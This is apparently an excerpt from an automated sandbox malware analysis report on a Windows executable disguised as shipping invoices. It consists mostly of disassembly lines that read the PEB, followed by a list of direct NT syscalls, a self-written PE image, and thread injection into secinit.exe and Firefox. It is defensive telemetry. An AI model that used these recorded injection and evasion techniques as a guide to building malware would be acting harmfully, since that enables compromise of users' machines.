                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166E284 mov eax, dword ptr fs:[00000030h]3_2_0166E284
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166E284 mov eax, dword ptr fs:[00000030h]3_2_0166E284
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B0283 mov eax, dword ptr fs:[00000030h]3_2_016B0283
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B0283 mov eax, dword ptr fs:[00000030h]3_2_016B0283
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B0283 mov eax, dword ptr fs:[00000030h]3_2_016B0283
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166656A mov eax, dword ptr fs:[00000030h]3_2_0166656A
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166656A mov eax, dword ptr fs:[00000030h]3_2_0166656A
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166656A mov eax, dword ptr fs:[00000030h]3_2_0166656A
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01638550 mov eax, dword ptr fs:[00000030h]3_2_01638550
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01638550 mov eax, dword ptr fs:[00000030h]3_2_01638550
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01640535 mov eax, dword ptr fs:[00000030h]3_2_01640535
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01640535 mov eax, dword ptr fs:[00000030h]3_2_01640535
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01640535 mov eax, dword ptr fs:[00000030h]3_2_01640535
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01640535 mov eax, dword ptr fs:[00000030h]3_2_01640535
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01640535 mov eax, dword ptr fs:[00000030h]3_2_01640535
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01640535 mov eax, dword ptr fs:[00000030h]3_2_01640535
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0165E53E mov eax, dword ptr fs:[00000030h]3_2_0165E53E
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0165E53E mov eax, dword ptr fs:[00000030h]3_2_0165E53E
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0165E53E mov eax, dword ptr fs:[00000030h]3_2_0165E53E
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0165E53E mov eax, dword ptr fs:[00000030h]3_2_0165E53E
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0165E53E mov eax, dword ptr fs:[00000030h]3_2_0165E53E
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016C6500 mov eax, dword ptr fs:[00000030h]3_2_016C6500
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01704500 mov eax, dword ptr fs:[00000030h]3_2_01704500
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01704500 mov eax, dword ptr fs:[00000030h]3_2_01704500
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01704500 mov eax, dword ptr fs:[00000030h]3_2_01704500
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01704500 mov eax, dword ptr fs:[00000030h]3_2_01704500
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01704500 mov eax, dword ptr fs:[00000030h]3_2_01704500
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01704500 mov eax, dword ptr fs:[00000030h]3_2_01704500
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01704500 mov eax, dword ptr fs:[00000030h]3_2_01704500
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0165E5E7 mov eax, dword ptr fs:[00000030h]3_2_0165E5E7
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0165E5E7 mov eax, dword ptr fs:[00000030h]3_2_0165E5E7
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0165E5E7 mov eax, dword ptr fs:[00000030h]3_2_0165E5E7
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0165E5E7 mov eax, dword ptr fs:[00000030h]3_2_0165E5E7
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0165E5E7 mov eax, dword ptr fs:[00000030h]3_2_0165E5E7
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0165E5E7 mov eax, dword ptr fs:[00000030h]3_2_0165E5E7
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0165E5E7 mov eax, dword ptr fs:[00000030h]3_2_0165E5E7
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0165E5E7 mov eax, dword ptr fs:[00000030h]3_2_0165E5E7
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016325E0 mov eax, dword ptr fs:[00000030h]3_2_016325E0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166C5ED mov eax, dword ptr fs:[00000030h]3_2_0166C5ED
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166C5ED mov eax, dword ptr fs:[00000030h]3_2_0166C5ED
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166E5CF mov eax, dword ptr fs:[00000030h]3_2_0166E5CF
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166E5CF mov eax, dword ptr fs:[00000030h]3_2_0166E5CF
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016365D0 mov eax, dword ptr fs:[00000030h]3_2_016365D0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166A5D0 mov eax, dword ptr fs:[00000030h]3_2_0166A5D0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166A5D0 mov eax, dword ptr fs:[00000030h]3_2_0166A5D0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B05A7 mov eax, dword ptr fs:[00000030h]3_2_016B05A7
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B05A7 mov eax, dword ptr fs:[00000030h]3_2_016B05A7
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B05A7 mov eax, dword ptr fs:[00000030h]3_2_016B05A7
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016545B1 mov eax, dword ptr fs:[00000030h]3_2_016545B1
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016545B1 mov eax, dword ptr fs:[00000030h]3_2_016545B1
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01632582 mov eax, dword ptr fs:[00000030h]3_2_01632582
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01632582 mov ecx, dword ptr fs:[00000030h]3_2_01632582
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01664588 mov eax, dword ptr fs:[00000030h]3_2_01664588
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166E59C mov eax, dword ptr fs:[00000030h]3_2_0166E59C
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016BC460 mov ecx, dword ptr fs:[00000030h]3_2_016BC460
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0165A470 mov eax, dword ptr fs:[00000030h]3_2_0165A470
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0165A470 mov eax, dword ptr fs:[00000030h]3_2_0165A470
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0165A470 mov eax, dword ptr fs:[00000030h]3_2_0165A470
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166E443 mov eax, dword ptr fs:[00000030h]3_2_0166E443
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166E443 mov eax, dword ptr fs:[00000030h]3_2_0166E443
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166E443 mov eax, dword ptr fs:[00000030h]3_2_0166E443
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166E443 mov eax, dword ptr fs:[00000030h]3_2_0166E443
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166E443 mov eax, dword ptr fs:[00000030h]3_2_0166E443
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166E443 mov eax, dword ptr fs:[00000030h]3_2_0166E443
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166E443 mov eax, dword ptr fs:[00000030h]3_2_0166E443
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166E443 mov eax, dword ptr fs:[00000030h]3_2_0166E443
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016EA456 mov eax, dword ptr fs:[00000030h]3_2_016EA456
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0162645D mov eax, dword ptr fs:[00000030h]3_2_0162645D
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0165245A mov eax, dword ptr fs:[00000030h]3_2_0165245A
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0162E420 mov eax, dword ptr fs:[00000030h]3_2_0162E420
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0162E420 mov eax, dword ptr fs:[00000030h]3_2_0162E420
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0162E420 mov eax, dword ptr fs:[00000030h]3_2_0162E420
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0162C427 mov eax, dword ptr fs:[00000030h]3_2_0162C427
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B6420 mov eax, dword ptr fs:[00000030h]3_2_016B6420
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B6420 mov eax, dword ptr fs:[00000030h]3_2_016B6420
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B6420 mov eax, dword ptr fs:[00000030h]3_2_016B6420
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B6420 mov eax, dword ptr fs:[00000030h]3_2_016B6420
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B6420 mov eax, dword ptr fs:[00000030h]3_2_016B6420
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B6420 mov eax, dword ptr fs:[00000030h]3_2_016B6420
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B6420 mov eax, dword ptr fs:[00000030h]3_2_016B6420
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166A430 mov eax, dword ptr fs:[00000030h]3_2_0166A430
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01668402 mov eax, dword ptr fs:[00000030h]3_2_01668402
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01668402 mov eax, dword ptr fs:[00000030h]3_2_01668402
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01668402 mov eax, dword ptr fs:[00000030h]3_2_01668402
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016304E5 mov ecx, dword ptr fs:[00000030h]3_2_016304E5
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016364AB mov eax, dword ptr fs:[00000030h]3_2_016364AB
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016644B0 mov ecx, dword ptr fs:[00000030h]3_2_016644B0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016BA4B0 mov eax, dword ptr fs:[00000030h]3_2_016BA4B0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016EA49A mov eax, dword ptr fs:[00000030h]3_2_016EA49A
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01638770 mov eax, dword ptr fs:[00000030h]3_2_01638770
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01640770 mov eax, dword ptr fs:[00000030h]3_2_01640770
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01640770 mov eax, dword ptr fs:[00000030h]3_2_01640770
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01640770 mov eax, dword ptr fs:[00000030h]3_2_01640770
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01640770 mov eax, dword ptr fs:[00000030h]3_2_01640770
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01640770 mov eax, dword ptr fs:[00000030h]3_2_01640770
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01640770 mov eax, dword ptr fs:[00000030h]3_2_01640770
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01640770 mov eax, dword ptr fs:[00000030h]3_2_01640770
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01640770 mov eax, dword ptr fs:[00000030h]3_2_01640770
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01640770 mov eax, dword ptr fs:[00000030h]3_2_01640770
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01640770 mov eax, dword ptr fs:[00000030h]3_2_01640770
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01640770 mov eax, dword ptr fs:[00000030h]3_2_01640770
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01640770 mov eax, dword ptr fs:[00000030h]3_2_01640770
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166674D mov esi, dword ptr fs:[00000030h]3_2_0166674D
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166674D mov eax, dword ptr fs:[00000030h]3_2_0166674D
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166674D mov eax, dword ptr fs:[00000030h]3_2_0166674D
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01630750 mov eax, dword ptr fs:[00000030h]3_2_01630750
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016BE75D mov eax, dword ptr fs:[00000030h]3_2_016BE75D
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01672750 mov eax, dword ptr fs:[00000030h]3_2_01672750
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01672750 mov eax, dword ptr fs:[00000030h]3_2_01672750
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B4755 mov eax, dword ptr fs:[00000030h]3_2_016B4755
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166C720 mov eax, dword ptr fs:[00000030h]3_2_0166C720
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166C720 mov eax, dword ptr fs:[00000030h]3_2_0166C720
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166273C mov eax, dword ptr fs:[00000030h]3_2_0166273C
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166273C mov ecx, dword ptr fs:[00000030h]3_2_0166273C
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166273C mov eax, dword ptr fs:[00000030h]3_2_0166273C
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016AC730 mov eax, dword ptr fs:[00000030h]3_2_016AC730
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166C700 mov eax, dword ptr fs:[00000030h]3_2_0166C700
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01630710 mov eax, dword ptr fs:[00000030h]3_2_01630710
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01660710 mov eax, dword ptr fs:[00000030h]3_2_01660710
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeNtCreateMutant: Direct from: 0x774635CCJump to behavior
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeNtWriteVirtualMemory: Direct from: 0x77462E3CJump to behavior
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeNtMapViewOfSection: Direct from: 0x77462D1CJump to behavior
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeNtResumeThread: Direct from: 0x774636ACJump to behavior
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeNtProtectVirtualMemory: Direct from: 0x77462F9CJump to behavior
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeNtSetInformationProcess: Direct from: 0x77462C5CJump to behavior
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeNtSetInformationThread: Direct from: 0x774563F9Jump to behavior
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeNtNotifyChangeKey: Direct from: 0x77463C2CJump to behavior
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeNtProtectVirtualMemory: Direct from: 0x77457B2EJump to behavior
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeNtAllocateVirtualMemory: Direct from: 0x77462BFCJump to behavior
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeNtQueryInformationProcess: Direct from: 0x77462C26Jump to behavior
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeNtResumeThread: Direct from: 0x77462FBCJump to behavior
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exeNtReadFile: Direct from: 0x77462ADCJump to behavior
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exe; NtQuerySystemInformation: Direct from: 0x77462DFC
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exe; NtDelayExecution: Direct from: 0x77462DDC
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exe; NtAllocateVirtualMemory: Direct from: 0x77463C9C
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exe; NtClose: Direct from: 0x77462B6C
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exe; NtCreateUserProcess: Direct from: 0x7746371C
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exe; NtWriteVirtualMemory: Direct from: 0x7746490C
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exe; NtAllocateVirtualMemory: Direct from: 0x774648EC
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exe; NtQuerySystemInformation: Direct from: 0x774648CC
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exe; NtQueryVolumeInformationFile: Direct from: 0x77462F2C
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exe; NtReadVirtualMemory: Direct from: 0x77462E8C
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exe; NtCreateKey: Direct from: 0x77462C6C
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exe; NtSetInformationThread: Direct from: 0x77462B4C
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exe; NtQueryAttributesFile: Direct from: 0x77462E6C
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exe; NtDeviceIoControlFile: Direct from: 0x77462AEC
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exe; NtOpenSection: Direct from: 0x77462E0C
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exe; NtCreateFile: Direct from: 0x77462FEC
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exe; NtOpenFile: Direct from: 0x77462DCC
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exe; NtQueryInformationToken: Direct from: 0x77462CAC
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exe; NtTerminateThread: Direct from: 0x77462FCC
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exe; NtAllocateVirtualMemory: Direct from: 0x77462BEC
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exe; NtOpenKeyEx: Direct from: 0x77462B9C
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe; Memory written: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe; Section loaded: NULL target: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exe protection: execute and read and write
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe; Section loaded: NULL target: C:\Windows\SysWOW64\secinit.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\secinit.exe; Section loaded: NULL target: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exe protection: read write
                Source: C:\Windows\SysWOW64\secinit.exe; Section loaded: NULL target: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\secinit.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\secinit.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\secinit.exe; Thread register set: target process: 7352
                Source: C:\Windows\SysWOW64\secinit.exe; Thread APC queued: target process: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exe
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe; Process created: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe "C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exe"
                Source: C:\Program Files (x86)\gwHbVoFLxuyEBRpvpyyhYgoypUBiIObXYYxowDrytdnYEacYRzTJqnCNWzxRHNDqtrQkZ\2zqVCuEmR.exe; Process created: C:\Windows\SysWOW64\secinit.exe "C:\Windows\SysWOW64\secinit.exe"
